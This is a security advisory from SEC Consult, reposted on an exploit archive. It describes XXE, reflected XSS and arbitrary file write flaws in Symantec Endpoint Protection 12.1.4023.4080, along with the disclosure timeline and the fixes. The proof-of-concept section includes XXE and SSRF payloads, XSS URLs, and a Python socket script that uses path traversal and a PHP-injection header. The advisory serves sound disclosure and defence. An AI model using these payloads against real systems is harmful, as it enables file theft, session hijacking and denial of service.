exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Symantec Endpoint Protection 12.1.4023.4080 XXE / XSS / Arbitrary File Write

Symantec Endpoint Protection 12.1.4023.4080 XXE / XSS / Arbitrary File Write
Posted Nov 6, 2014
Authored by S. Viehbock | Site sec-consult.com

Symantec Endpoint Protection version 12.1.4023.4080 suffers from XXE injection, cross site scripting, and arbitrary file write vulnerabilities.

tags | exploit, arbitrary, vulnerability, xss, xxe
advisories | CVE-2014-3437, CVE-2014-3438, CVE-2014-3439
SHA-256 | 8dac04a3f8aa31944840699e39fc5cb46e42c335bda4f13704749fd690e88f91

Symantec Endpoint Protection 12.1.4023.4080 XXE / XSS / Arbitrary File Write

Change Mirror Download
SEC Consult Vulnerability Lab Security Advisory < 20141106-0 >
=======================================================================
title: XXE & XSS & Arbitrary File Write vulnerabilities
product: Symantec Endpoint Protection
vulnerable version: 12.1.4023.4080
fixed version: 12.1.5 (RU 5)
impact: Critical
CVE number: CVE-2014-3437, CVE-2014-3438, CVE-2014-3439
homepage: https://www.symantec.com
found: 2014-07-01
by: Stefan Viehböck
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================


Vendor description:
-------------------
"Symantec Endpoint Protection is a client-server solution that protects
laptops, desktops, Windows and Mac computers, and servers in your network
against malware. Symantec Endpoint Protection combines virus protection with
advanced threat protection to proactively secure your computers against known
and unknown threats.
Symantec Endpoint Protection protects against malware such as viruses, worms,
Trojan horses, spyware, and adware. It provides protection against even the
most sophisticated attacks that evade traditional security measures, such as
rootkits, zero-day attacks, and spyware that mutates. Providing low maintenance
and high power, Symantec Endpoint Protection communicates over your network to
automatically safeguard for both physical systems and virtual systems against
attacks."

Source:
https://www.symantec.com/endpoint-protection
https://www.symantec.com/business/support/index?page=content&id=DOC6153


Business recommendation:
------------------------
Attackers are able to perform denial-of-service attacks against the Endpoint
Protection Manager which directly impacts the effectiveness of the client-side
endpoint protection. Furthermore, session identifiers of users can be stolen
to impersonate them and gain unauthorized access to the server.

All of these attacks can have a severe impact on the security infrastructure.
An update to the latest version (12.1.5 RU 5) is highly recommended.



Vulnerability overview/description:
-----------------------------------
1) XML External Entity Injection (XXE) [CVE-2014-3437]
Multiple XXE vulnerabilities were found in the Endpoint Protection Manager
application. An attacker needs to perform MitM attacks to impersonate
securityresponse.symantec.com (eg. via DNS poisoning/spoofing/hijacking,
ARP spoofing, QUANTUM-style attacks, ...) to inject malicious XML code.
These vulnerabilities can be used to execute server side request
forgery (SSRF) attacks used for portscanning/fingerprinting, denial of service,
file disclosure as well as attacks against functionality that is only
exposed internally (see CVE-2013-5015 and issue #3).

Note:
The exploitation scenario proves that the previous command execution via
SQL injection was exploitable for an external attacker with the ability to
manipulate internet traffic _without any prior knowledge_ of the target system.


2) Reflected Cross-Site-Scripting (XSS) [CVE-2014-3438]
Endpoint Protection Manager suffers from a reflected cross-site scripting
vulnerability, which allows an attacker to steal other users' sessions, to
impersonate other users and to gain unauthorized access to the admin interface.


3) Unauthenticated Arbitrary File Write/Overwrite [CVE-2014-3439]
Arbitrary files can be written or overwritten by an unauthenticated attacker.
The target file is truncated in the process which results in Denial of Service.
However it might be possible to write files with arbitrary content nonetheless.



Proof of concept:
-----------------
1) XML External Entity Injection (XXE) [CVE-2014-3437]
The Symantec Protection Center component downloads XML files from
https://securityresponse.symantec.com for information purposes.
By impersonating securityresponse.symantec.com (eg. via DNS
poisoning/spoofing/hijacking, ARP spoofing, QUANTUM-style attacks, ...) an
attacker can inject malicious XML code into the file contents and thus exploit
XXE vulnerabilities.

For example by offering the following XML code at the URL
https://securityresponse.symantec.com/avcenter/deepsightkiosk/9.xml
arbitrary files can be disclosed via the Symantec Protection Center login
page at https://<HOST>:8443/portal/Login.jsp

===============================================================================
<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE a [<!ENTITY e SYSTEM 'file:///c:/windows/win.ini'> ]>

<data>
<regular>
<text>&e;</text>
</regular>
<outbreak></outbreak>
<threatcon>1</threatcon>
</data>
===============================================================================


Server Side Request Forgery (SSRF) can be exploited like in the following
example that sets the application log level to "log all messages" eg. via
https://securityresponse.symantec.com/avcenter/deepsightkiosk/10.xml

===============================================================================
<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE a [<!ENTITY e SYSTEM
'https://localhost:9090/servlet/ConsoleServlet?ActionType=ConfigServer&logLevel=ALL'> ]>
<foo>&e;</foo>
===============================================================================

Furthermore some files can be exfiltrated to remote servers via the
techniques described in:
https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf
https://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf


2) Reflected Cross-Site-Scripting (XSS) [CVE-2014-3438]
At least the following URLs are vulnerable to XSS:
https://<HOST>:8443/console/Highlander_docs/SSO-Error.jsp?ErrorMsg=<script>alert('xss')</script>
https://<HOST>:8443/portal/Loading.jsp?uri=Ij48c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0Pj9BQUFBPUJCQkIiPjxzY3JpcHQ%2bYWxlcnQoJ3hzcycpPC9zY3JpcHQ%2b


3) Unauthenticated Arbitrary File Write/Overwrite [CVE-2014-3439]
A flaw in ConsoleServlet allows an attacker to specify the application server
thread name via the ActionType parameter. As the thread name is used in
the pattern that is passed to the java.util.logging.FileHandler constructor
by the logging component (ServerLogger) an attacker can define the log file
path. By causing an exception in the thread, the log file is written to
disk.
The following code snippet causes an exception by terminating the TCP
connection before the server has finished writing the response to the socket.

ActionType=/../../../../../../../../../../WINDOWS/win.ini%00 causes the win.ini
file to be truncated.

===============================================================================
import socket
import struct

HOST = '<HOST>'
PORT = 9090
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
l_onoff = 1
l_linger = 0
s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,struct.pack('ii', l_onoff, l_linger))

msg = '''GET
/servlet/ConsoleServlet?ActionType=/../../../../../../../../../../WINDOWS/win.ini%00
HTTP/1.1
Host: SYMEPP
EvilContent: <?php evilcode(); ?>

'''

s.sendall(msg)
s.shutdown(socket.SHUT_RD)
===============================================================================


ActionType=/../../Inetpub/Reporting/evil.php%00 causes the (empty) file
evil.php to be written into the Apache webroot.

ActionType=/../../Inetpub/Reporting/evil.php causes the file
evil-0.log to be written into the Apache webroot.

If the application log level has been set to "DEBUG" (which can be achieved
via XXE, see issue #1) the file content includes all headers passed in the
HTTP request (including the EvilContent header in the example above). However
the file will not be processed by PHP because of the .log extension. Due to
the complex nature of the Windows filesystem addressing modes (legacy/DOS,
ADS, etc.) it is entirely possible that this limitation can be bypassed.



Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in Symantec Endpoint Protection
version 12.1.4023.4080, which was the most recent version at the time of discovery.


Vendor contact timeline:
------------------------
2014-07-11: Initial contact to secure@symantec.com
2014-07-29: Ask for status at secure@symantec.com
2014-08-01: Conference call about status, extended grace period to 2014-10-31
September/October: Several discussions / rechecks of the vulnerabilities
2014-11-06: Coordinated release of the advisory


Solution:
---------

1) XML External Entity Injection (XXE) [CVE-2014-3437]

Update to version 12.1.5 RU 5

2) Reflected Cross-Site-Scripting (XSS) [CVE-2014-3438]

Update to version 12.1.5 RU 5

3) Unauthenticated Arbitrary File Write/Overwrite [CVE-2014-3439]

The update to version 12.1.5 RU 5 only partially mitigates the vulnerability.
Path Traversal is no longer possible, which reduces the severity to
low/medium. The vendor claims that it will be entirely solved in the next
version (12.1.5 RU6).


For further information see the security advisory of the vendor:
https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20141105_00


Workaround:
-----------
See Symantec security advisory for further mitigations.


Advisory URL:
--------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: https://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

Interested in working with the experts of SEC Consult?
Write to career@sec-consult.com

EOF Stefan Viehböck / @2014

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close